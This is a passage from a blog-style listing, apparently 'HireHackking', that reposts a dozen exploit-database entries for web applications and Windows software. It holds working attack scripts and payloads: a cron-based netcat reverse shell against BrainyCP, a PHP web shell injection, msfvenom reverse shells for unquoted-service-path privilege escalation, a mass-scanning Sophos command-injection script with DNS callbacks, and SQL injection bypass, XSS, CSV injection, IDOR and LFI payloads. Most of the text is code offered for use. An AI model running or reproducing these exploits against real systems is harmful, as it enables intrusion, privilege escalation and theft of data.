    # Exploit Title: BrainyCP V1.0 - Remote Code Execution # Date: 2023-04-03 # Exploit Author: Ahmet Ümit BAYRAM # Vendor Homepage: https://brainycp.io # Demo: https://demo.brainycp.io # Tested on: Kali Linux # CVE : N/A import requests # credentials url = input("URL: ") username = input("Username: ") password = input("Password: ") ip = input("IP: ") port = input("Port: ") # login session = requests.Session() login_url = f"{url}/auth.php" login_data = {"login": username, "password": password, "lan": "/"} response = session.post(login_url, data=login_data) if "Sign In" in response.text: print("[-] Wrong credentials or may the system patched.") exit() # reverse shell reverse_shell = f"nc {ip} {port} -e /bin/bash" # request add_cron_url = f"{url}/index.php?do=crontab&subdo=ajax&subaction=addcron" add_cron_data = { "cron_freq_minutes": "*", "cron_freq_minutes_own": "", "cron_freq_hours": "*", "cron_freq_hours_own": "", "cron_freq_days": "*", "cron_freq_days_own": "", "cron_freq_months": "*", "cron_freq_weekdays": "*", "cron_command": reverse_shell, "cron_user": username, } response = session.post(add_cron_url, data=add_cron_data) print("[+] Check your listener!")
  9. HireHackking

    Bludit 4.0.0-rc-2 - Account takeover

    HireHackking posted a blog entry in Hacker Technology
    ## Exploit Title: Bludit 4.0.0-rc-2 - Account takeover ## Author: nu11secur1ty ## Date: 04.11.2013 ## Vendor: https://www.bludit.com/ ## Software: https://github.com/bludit/bludit/releases/tag/4.0.0-rc-2 ## Reference: https://www.cloudflare.com/learning/access-management/account-takeover/ ## Reference: https://portswigger.net/daily-swig/facebook-account-takeover-researcher-scoops-40k-bug-bounty-for-chained-exploit ## Description: The already authenticated attacker can send a normal request to change his password and then he can use the same JSON `object` and the vulnerable `API token KEY` in the same request to change the admin account password. Then he can access the admin account and he can do very malicious stuff. STATUS: HIGH Vulnerability [+]Exploit: ```PUT PUT /api/users/admin HTTP/1.1 Host: 127.0.0.1:8000 Content-Length: 138 sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.50 Safari/537.36 content-type: application/json Accept: */* Origin: http://127.0.0.1:8000 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://127.0.0.1:8000/admin/edit-user/pwned Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: BLUDIT-KEY=98t31p2g0i7t6rscufuccpthui Connection: close {"token":"4f8df9f64e84fa4562ec3a604bf7985c","authentication":"6d1a5510a53f9d89325b0cd56a2855a9","username":"pwned","password":"password1"} ``` [+]Response: ```HTTP HTTP/1.1 200 OK Host: 127.0.0.1:8000 Date: Tue, 11 Apr 2023 08:33:51 GMT Connection: close X-Powered-By: PHP/7.4.30 Access-Control-Allow-Origin: * Content-Type: application/json {"status":"0","message":"User edited.","data":{"key":"admin"}} ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/bludit/2023/Bludit-v4.0.0-Release-candidate-2) ## Proof and Exploit: [href](https://streamable.com/w3aa4d) ## Time spend: 00:57:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/> -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>
  10. HireHackking

    Multi-Vendor Online Groceries Management System 1.0 - Remote Code Execution

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Multi-Vendor Online Groceries Management System 1.0 - Remote Code Execution (RCE) # Date: 4/23/2023 # Author: Or4nG.M4n # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/15166/multi-vendor-online-groceries-management-system-phpoop-free-source-code.html # Version: 1.0 # Tested on: windows # # Vuln File : SystemSettings.php < here you can inject php code # if(isset($_POST['content'])){ # foreach($_POST['content'] as $k => $v) # file_put_contents("../{$k}.html",$v); <=== put any code into welcome.html or whatever you want # } # Vuln File : home.php < here you can include and execute you're php code # <h3 class="text-center">Welcome</h3> # <hr> # <div class="welcome-content"> # <?php include("welcome.html") ?> <=== include # </div> import requests url = input("Enter url :") postdata = {'content[welcome]':'<?php if(isset($_REQUEST[\'cmd\'])){ echo "<pre>"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo "</pre>"; die; }?>'} resp = requests.post(url+"/classes/SystemSettings.php?f=update_settings", postdata) print("[+] injection in welcome page") print("[+]"+url+"/?cmd=ls -al") print("\n")
  11. HireHackking

    Mars Stealer 8.3 - Admin Account Takeover

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Mars Stealer 8.3 - Admin Account Takeover # Product: Mars Stelaer # Technology: PHP # Version: < 8.3 # Google Dork: N/A # Date: 20.04.2023 # Tested on: Linux # Author: Sköll - twitter.com/s_k_o_l_l import argparse import requests parser = argparse.ArgumentParser(description='Mars Stealer Account Takeover Exploit') parser.add_argument('-u', '--url', required=True, help='Example: python3 exploit.py -u http://localhost/') args = parser.parse_args() url = args.url.rstrip('/') + '/includes/settingsactions.php' headers = {"Accept": "application/json, text/javascript, */*; q=0.01", "X-Requested-With": "XMLHttpRequest", "User-Agent": "Sköll", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "Origin": url, "Referer": url, "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US;q=0.8,en;q=0.7"} data = {"func": "savepwd", "pwd": "sköll"} #change password response = requests.post(url, headers=headers, data=data) if response.status_code == 200: print("Succesfull!") print("New Password: " + data["pwd"]) else: print("Exploit Failed!")
  12. HireHackking

    Arcsoft PhotoStudio 6.0.0.172 - Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    ########################################################################## # # # Exploit Title: Arcsoft PhotoStudio 6.0.0.172 - Unquoted Service Path # # Date: 2023/04/22 # # Exploit Author: msd0pe # # Vendor Homepage: https://www.arcsoft.com/ # # My Github: https://github.com/msd0pe-1 # # # ########################################################################## Arcsoft PhotoStudio: Versions =< 6.0.0.172 contains an unquoted service path which allows attackers to escalate privileges to the system level. [1] Find the unquoted service path: > wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """ ArcSoft Exchange Service ADExchange C:\Program Files (x86)\Common Files\ArcSoft\esinter\Bin\eservutil.exe Auto [2] Get informations about the service: > sc qc "ADExchange" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: ADExchange TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 0 IGNORE BINARY_PATH_NAME : C:\Program Files (x86)\Common Files\ArcSoft\esinter\Bin\eservutil.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : ArcSoft Exchange Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem [3] Generate a reverse shell: > msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o Common.exe [4] Upload the reverse shell to C:\Program Files (x86)\Common.exe > put Commom.exe > ls drw-rw-rw- 0 Sun Apr 23 04:10:25 2023 . drw-rw-rw- 0 Sun Apr 23 04:10:25 2023 .. drw-rw-rw- 0 Sun Apr 23 03:55:37 2023 ArcSoft drw-rw-rw- 0 Sun Apr 23 03:55:36 2023 Common Files -rw-rw-rw- 7168 Sun Apr 23 04:10:25 2023 Common.exe -rw-rw-rw- 174 Sun Jul 24 08:12:38 2022 desktop.ini drw-rw-rw- 0 Sun Apr 23 03:55:36 2023 InstallShield Installation Information drw-rw-rw- 0 Thu Jul 28 13:00:04 2022 Internet Explorer drw-rw-rw- 0 Sun Jul 24 07:27:06 2022 Microsoft drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Microsoft.NET drw-rw-rw- 0 Sat Apr 22 05:48:20 2023 Windows Defender drw-rw-rw- 0 Sat Apr 22 05:46:44 2023 Windows Mail drw-rw-rw- 0 Thu Jul 28 13:00:04 2022 Windows Media Player drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Windows Multimedia Platform drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Windows NT drw-rw-rw- 0 Fri Oct 28 05:25:41 2022 Windows Photo Viewer drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Windows Portable Devices drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Windows Sidebar drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 WindowsPowerShell [5] Start listener > nc -lvp 4444 [6] Reboot the service/server > sc stop "ADExchange" > sc start "ADExchange" OR > shutdown /r [7] Enjoy ! 192.168.1.102: inverse host lookup failed: Unknown host connect to [192.168.1.101] from (UNKNOWN) [192.168.1.102] 51309 Microsoft Windows [Version 10.0.19045.2130] (c) Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami nt authority\system
  13. HireHackking

    Wondershare Filmora 12.2.9.2233 - Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    ############################################################################ # # # Exploit Title: Wondershare Filmora 12.2.9.2233 - Unquoted Service Path # # Date: 2023/04/23 # # Exploit Author: msd0pe # # Vendor Homepage: https://www.wondershare.com # # My Github: https://github.com/msd0pe-1 # # # ############################################################################ Wondershare Filmora: Versions =< 12.2.9.2233 contains an unquoted service path which allows attackers to escalate privileges to the system level. [1] Find the unquoted service path: > wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """ Wondershare Native Push Service NativePushService C:\Users\msd0pe\AppData\Local\Wondershare\Wondershare NativePush\WsNativePushService.exe Auto [2] Get informations about the service: > sc qc "NativePushService" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: NativePushService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Users\msd0pe\AppData\Local\Wondershare\Wondershare NativePush\WsNativePushService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Wondershare Native Push Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem [3] Generate a reverse shell: > msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o Wondershare.exe [4] Upload the reverse shell to C:\Users\msd0pe\AppData\Local\Wondershare\Wondershare.exe > put Wondershare.exe > ls drw-rw-rw- 0 Sun Apr 23 14:51:47 2023 . drw-rw-rw- 0 Sun Apr 23 14:51:47 2023 .. drw-rw-rw- 0 Sun Apr 23 14:36:26 2023 Wondershare Filmora Update drw-rw-rw- 0 Sun Apr 23 14:37:13 2023 Wondershare NativePush -rw-rw-rw- 7168 Sun Apr 23 14:51:47 2023 Wondershare.exe drw-rw-rw- 0 Sun Apr 23 13:52:30 2023 WSHelper [5] Start listener > nc -lvp 4444 [6] Reboot the service/server > sc stop "NativePushService" > sc start "NativePushService" OR > shutdown /r [7] Enjoy ! 192.168.1.102: inverse host lookup failed: Unknown host connect to [192.168.1.101] from (UNKNOWN) [192.168.1.102] 51309 Microsoft Windows [Version 10.0.19045.2130] (c) Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami nt authority\system
  14. HireHackking

    Sophos Web Appliance 4.3.10.4 - Pre-auth command injection

    HireHackking posted a blog entry in Hacker Technology
    #!/bin/bash # Exploit Title: Sophos Web Appliance 4.3.10.4 - Pre-auth command injection # Exploit Author: Behnam Abasi Vanda # Vendor Homepage: https://www.sophos.com # Version: Sophos Web Appliance older than version 4.3.10.4 # Tested on: Ubuntu # CVE : CVE-2023-1671 # Shodan Dork: title:"Sophos Web Appliance" # Reference : https://www.sophos.com/en-us/security-advisories/sophos-sa-20230404-swa-rce # Reference : https://vulncheck.com/blog/cve-2023-1671-analysis TARGET_LIST="$1" # ===================== BOLD="\033[1m" RED="\e[1;31m" GREEN="\e[1;32m" YELLOW="\e[1;33m" BLUE="\e[1;34m" NOR="\e[0m" # ==================== get_new_subdomain() { cat MN.txt | grep 'YES' >/dev/null;ch=$? if [ $ch -eq 0 ];then echo -e " [+] Trying to get Subdomain $NOR" rm -rf cookie.txt sub=`curl -i -c cookie.txt -s -k -X $'GET' \ -H $'Host: www.dnslog.cn' -H $'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/112.0' -H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: close' -H $'Referer: http://www.dnslog.cn/' \ $'http://www.dnslog.cn/getdomain.php?t=0' | grep dnslog.cn` echo -e " [+]$BOLD$GREEN Subdomain : $sub $NOR" fi } check_vuln() { curl -k --trace-ascii % "https://$1/index.php?c=blocked&action=continue" -d "args_reason=filetypewarn&url=$RANDOM&filetype=$RANDOM&user=$RANDOM&user_encoded=$(echo -n "';ping $sub -c 3 #" | base64)" req=`curl -i -s -k -b cookie.txt -X $'GET' \ -H $'Host: www.dnslog.cn' -H $'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/112.0' -H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: close' -H $'Referer: http://www.dnslog.cn/' \ $'http://www.dnslog.cn/getrecords.php?t=0'` echo "$req" | grep 'dnslog.cn' >/dev/null;ch=$? if [ $ch -eq 0 ];then echo "YES" > MN.txt echo -e " [+]$BOLD $RED https://$1 Vulnerable :D $NOR" echo "https://$1" >> vulnerable.lst else echo -e " [-] https://$1 Not Vulnerable :| $NOR" echo "NO" > MN.txt fi } echo ' ██████╗██╗ ██╗███████╗ ██████╗ ██████╗ ██████╗ ██████╗ ██╗ ██████╗███████╗ ██╔════╝██║ ██║██╔════╝ ╚════██╗██╔═████╗╚════██╗╚════██╗ ███║██╔════╝╚════██║ ██║ ██║ ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝ █████╔╝█████╗╚██║███████╗ ██╔╝ ██║ ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚═══██╗╚════╝ ██║██╔═══██╗ ██╔╝ ╚██████╗ ╚████╔╝ ███████╗ ███████╗╚██████╔╝███████╗██████╔╝ ██║╚██████╔╝ ██║ ╚═════╝ ╚═══╝ ╚══════╝ ╚══════╝ ╚═════╝ ╚══════╝╚═════╝ ╚═╝ ╚═════╝ ╚═╝ ██████╗ ██╗ ██╗ ██████╗ ███████╗██╗ ██╗███╗ ██╗ █████╗ ███╗ ███╗ ██╗ ██╔══██╗╚██╗ ██╔╝ ██╔══██╗██╔════╝██║ ██║████╗ ██║██╔══██╗████╗ ████║ ██╗╚██╗ ██████╔╝ ╚████╔╝ ██████╔╝█████╗ ███████║██╔██╗ ██║███████║██╔████╔██║ ╚═╝ ██║ ██╔══██╗ ╚██╔╝ ██╔══██╗██╔══╝ ██╔══██║██║╚██╗██║██╔══██║██║╚██╔╝██║ ▄█╗ ██║ ██████╔╝ ██║ ██████╔╝███████╗██║ ██║██║ ╚████║██║ ██║██║ ╚═╝ ██║ ▀═╝██╔╝ ╚═════╝ ╚═╝ ╚═════╝ ╚══════╝╚═╝ ╚═╝╚═╝ ╚═══╝╚═╝ ╚═╝╚═╝ ╚═╝ ╚═╝ ' if test "$#" -ne 1; then echo " ----------------------------------------------------------------" echo " [!] please give the target list file : bash CVE-2023-1671.sh targets.txt " echo " ---------------------------------------------------------------" exit fi rm -rf cookie.txt echo "YES" > MN.txt for target in `cat $TARGET_LIST` do get_new_subdomain; echo " [~] Checking $target" check_vuln "$target" done rm -rf MN.txt rm -rf cookie.txt
  15. HireHackking

    projectSend r1605 - Private file download

    HireHackking posted a blog entry in Hacker Technology
    Exploit Title: projectSend r1605 - Private file download Application: projectSend Version: r1605 Bugs: IDOR Technology: PHP Vendor URL: https://www.projectsend.org/ Software Link: https://www.projectsend.org/ Date of found: 24-01-2023 Author: Mirabbas Ağalarov Tested on: Linux Technical Details & POC ======================================== 1.Access to private files of any user, including admin just change id GET /process.php?do=download&id=[any user's private pictures id] HTTP/1.1 Host: localhost sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Linux" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/manage-files.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: download_started=false; PHPSESSID=e46dtgmf95uu0usnceebfqbp0f Connection: close
  16. HireHackking

    PHP Restaurants 1.0 - SQLi Authentication Bypass & Cross Site Scripting

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: PHP Restaurants 1.0 - SQLi Authentication Bypass & Cross Site Scripting (XSS) # Google Dork: None # Date: 4/26/2023 # Exploit Author: Or4nG.M4n # Vendor Homepage: https://github.com/jcwebhole # Software Link: https://github.com/jcwebhole/php_restaurants # Version: 1.0 functions.php function login(){ global $conn; $email = $_POST['email']; $pw = $_POST['password']; $sql = "SELECT * FROM `users` WHERE `email` = '".$email."' AND `password` = '".md5($pw)."'"; <-- there is No filter to secure sql query parm[email][password] $result = $conn->query($sql); if ($result->num_rows > 0) { while($row = $result->fetch_assoc()) { setcookie('uid', $row['id'], time() + (86400 * 30), "/"); // 86400 = 1 day header('location: index.php'); } } else { header('location: login.php?m=Wrong Password'); } } login bypass at admin page /rest1/admin/login.php email & password : ' OR 1=1 -- <- add [space] end of the payload cross site scripting main page /index.php xhttp.open("GET", "functions.php?f=getRestaurants<?php if(isset($_GET['search'])) echo '&search='.$_GET['search']; <-- here we can insert our xss payload ?> ", true); xhttp.send(); </script> <-- when you insert your'e payload don't forget to add </script> like xss payload : </script><img onerror=alert(1) src=a>
  17. HireHackking

    phpMyFAQ v3.1.12 - CSV Injection

    HireHackking posted a blog entry in Hacker Technology
    Exploit Title: phpMyFAQ v3.1.12 - CSV Injection Application: phpMyFAQ Version: 3.1.12 Bugs: CSV Injection Technology: PHP Vendor URL: https://www.phpmyfaq.de/ Software Link: https://download.phpmyfaq.de/phpMyFAQ-3.1.12.zip Date of found: 21.04.2023 Author: Mirabbas Ağalarov Tested on: Windows 2. Technical Details & POC ======================================== Step 1. login as user step 2. Go to user control panel and change name as =calc|a!z| and save step 3. If admin Export users as CSV ,in The computer of admin occurs csv injection and will open calculator payload: calc|a!z| Poc video: https://youtu.be/lXwaexX-1uU
  18. HireHackking

    admidio v4.2.5 - CSV Injection

    HireHackking posted a blog entry in Hacker Technology
    Exploit Title: admidio v4.2.5 - CSV Injection Application: admidio Version: 4.2.5 Bugs: CSV Injection Technology: PHP Vendor URL: https://www.admidio.org/ Software Link: https://www.admidio.org/download.php Date of found: 26.04.2023 Author: Mirabbas Ağalarov Tested on: Windows 2. Technical Details & POC ======================================== Step 1. login as user step 2. Go to My profile (edit profile) and set postal code as =calc|a!z| and save (http://localhost/admidio/adm_program/modules/profile/profile_new.php?user_uuid=4b060d07-4e63-429c-a6b7-fc55325e92a2) step 3. If admin Export users as CSV or excell file ,in The computer of admin occurs csv injection and will open calculator (http://localhost/admidio/adm_program/modules/groups-roles/lists_show.php?rol_ids=2) payload: =calc|a!z| Poc video: https://www.youtube.com/watch?v=iygwj1izSMQ
  19. HireHackking

    revive-adserver v5.4.1 - Cross-Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    Exploit Title: revive-adserver v5.4.1 - Cross-Site Scripting (XSS) Application: revive-adserver Version: 5.4.1 Bugs: XSS Technology: PHP Vendor URL: https://www.revive-adserver.com/ Software Link: https://www.revive-adserver.com/download/ Date of found: 31-03-2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ======================================== steps: 1. Go to create banner 2. select the advanced section 3. Write this payload in the prepend and append parameters (%3Cscript%3Ealert%281%29%3C%2Fscript%3E) POST /www/admin/banner-advanced.php HTTP/1.1 Host: localhost Content-Length: 213 Cache-Control: max-age=0 sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Linux" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/www/admin/banner-advanced.php?clientid=3&campaignid=2&bannerid=2 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: sessionID=5224583cf474cd32d2ef37171c4d7894 Connection: close clientid=3&campaignid=2&bannerid=2&token=94c97eabe1ada8e7ae8f204e2ebf7180&prepend=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&append=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&submitbutton=De%C4%9Fi%C5%9Fiklikleri+Kaydet We are sending this link to the admin. then if admin clicks it will be exposed to xss http://localhost/www/admin/banner-advanced.php?clientid=3&campaignid=2&bannerid=2
  20. HireHackking

    SoftExpert (SE) Suite v2.1.3 - Local File Inclusion

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: SoftExpert (SE) Suite v2.1.3 - Local File Inclusion # Date: 27-04-2023 # Exploit Author: Felipe Alcantara (Filiplain) # Vendor Homepage: https://www.softexpert.com/ # Version: 2.0 < 2.1.3 # Tested on: Kali Linux # CVE : CVE-2023-30330 # SE Suite versions tested: 2.0.15.31, 2.0.15.115 # https://github.com/Filiplain/LFI-to-RCE-SE-Suite-2.0 # https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-30330 #!/bin/bash # Usage: ./lfi-poc.sh <domain> <username> <password> <File Path> target=$1 u=$2 p=$3 file=$(echo -n "$4"|base64 -w 0) end="\033[0m\e[0m" red="\e[0;31m\033[1m" blue="\e[0;34m\033[1m" echo -e "\n$4 : $file\n" echo -e "${blue}\nGETTING SESSION COOKIE${end}" cookie=$(curl -i -s -k -X $'POST' \ -H "Host: $target" -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0' -H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'X-Requested-With: XMLHttpRequest' -H $'Content-Length: 213' -H "Origin: https://$target" -H "Referer: https://$target/softexpert/login?page=home" -H $'Sec-Fetch-Dest: empty' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Site: same-origin' -H $'Te: trailers' -H $'Connection: close' \ -b $'language=1; _ga=GA1.3.151610227.1675447324; SEFGLANGUAGE=1; mode=deploy' \ --data-binary "json=%7B%22AuthenticationParameter%22%3A%7B%22language%22%3A3%2C%22hashGUID%22%3Anull%2C%22domain%22%3A%22%22%2C%22accessType%22%3A%22DESKTOP%22%2C%22login%22%3A%22$u%22%2C%22password%22%3A%22$p%22%7D%7D" \ "https://$target/softexpert/selogin"|grep se-authentication-token |grep "=" |cut -d ';' -f 1|sort -u|cut -d "=" -f 2) echo "cookie: $cookie" function LFI () { curl -s -k -X $'POST' \ -H "Host: $target" -H "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0" -H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8" -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'Content-Type: application/x-www-form-urlencoded' -H "Origin: https://$target" -H "Referer: https://$target/softexpert/workspace?page=home" -H 'Upgrade-Insecure-Requests: 1' -H 'Sec-Fetch-Dest: document' -H 'Sec-Fetch-Mode: navigate' -H 'Sec-Fetch-Site: same-origin' -H 'Te: trailers' -H 'Connection: close' \ -b "se-authentication-token=$cookie; _ga=GA1.3.151610227.1675447324; SEFGLANGUAGE=1; mode=deploy" \ --data-binary "action=4&managerName=lol&managerPath=$file&className=ZG9jX2RvY3VtZW50X2FkdmFuY2VkX2dyb3VwX2ZpbHRlcg%3D%3D&instantiate=false&loadJquery=false" \ "https://$target/se/v42300/generic/gn_defaultframe/2.0/defaultframe_filter.php" } echo -e "${blue}\nExploiting LFI:${end}" LFI function logout () { curl -i -s -k -X $'POST' \ -H "Host: $target" -H $'Content-Length: 0' -H $'Sec-Ch-Ua: \"Not_A Brand\";v=\"99\", \"Google Chrome\";v=\"109\", \"Chromium\";v=\"109\"' -H $'Accept: application/json, text/javascript, */*; q=0.01' -H $'X-Requested-With: XMLHttpRequest' -H $'Sec-Ch-Ua-Mobile: ?0' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36' -H $'Sec-Ch-Ua-Platform: \"Linux\"' -H "Origin: https://$target" -H $'Sec-Fetch-Site: same-origin' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Dest: empty' -H "Referer: https://$target/softexpert/workspace?page=home" -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-US,en;q=0.9' -H $'Connection: close' \ -b "se-authentication-token=$cookie; language=1; _ga=GA1.3.1890963078.1675081150; twk_uuid_5db840c5e4c2fa4b6bd8f89a=%7B%22uuid%22%3A%221.bJmDVb5PBlMumGNq2QO9gxk5hjdc6sp2pgENmao2hxHntg00r0qllmuXqCXTWG9uYLT1GkRDFuPY4ir63UIEJEXSS0pIJi8YlIvsB4edfrG1RTcS3CPr58feQBNf1%22%2C%22version%22%3A3%2C%22domain%22%3A%22$target%22%2C%22ts%22%3A1675081174571%7D; mode=deploy" \ "https://$target/softexpert/selogout" } echo -e "${blue}\nLogging out${end}" logout >/dev/null echo -e "\n\nDone!"
  21. HireHackking

    Serendipity 2.4.0 - File Inclusion RCE

    HireHackking posted a blog entry in Hacker Technology
    ## Exploit Title: Serendipity 2.4.0 - File Inclusion RCE ## Author: nu11secur1ty ## Date: 04.26.2023 ## Vendor: https://docs.s9y.org/index.html ## Software: https://github.com/s9y/Serendipity/releases/tag/2.4.0 ## Reference: https://portswigger.net/web-security/file-upload ## Reference: https://portswigger.net/web-security/file-upload/lab-file-upload-remote-code-execution-via-web-shell-upload ## Description: The already authenticated attacker can upload HTML files on the server, which is absolutely dangerous and STUPID In this file, the attacker can be codding a malicious web-socket responder that can connect with some nasty webserver somewhere. It depends on the scenario, the attacker can steal every day very sensitive information, for a very long period of time, until the other users will know that something is not ok with this system, and they decide to stop using her, but maybe they will be too late for this decision. STATUS: HIGH Vulnerability [+]Exploit: ```HTML <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>NodeJS WebSocket Server</title> </head> <body> <h1>You have just sent a message to your attacker,<br> <h1>that you are already connected to him.</h1> <script> const ws = new WebSocket("ws://attacker:8080"); ws.addEventListener("open", () =>{ console.log("We are connected to you"); ws.send("How are you, dear :)?"); }); ws.addEventListener('message', function (event) { console.log(event.data); }); </script> </body> </html> ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/s9y/2023/Serendipity-2.4.0) ## Proof and Exploit: [href](https://streamable.com/2s80z6) ## Time spend: 01:27:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=nu11secur1ty <http://nu11secur1ty.com/>
  22. HireHackking

    Bang Resto v1.0 - Stored Cross-Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
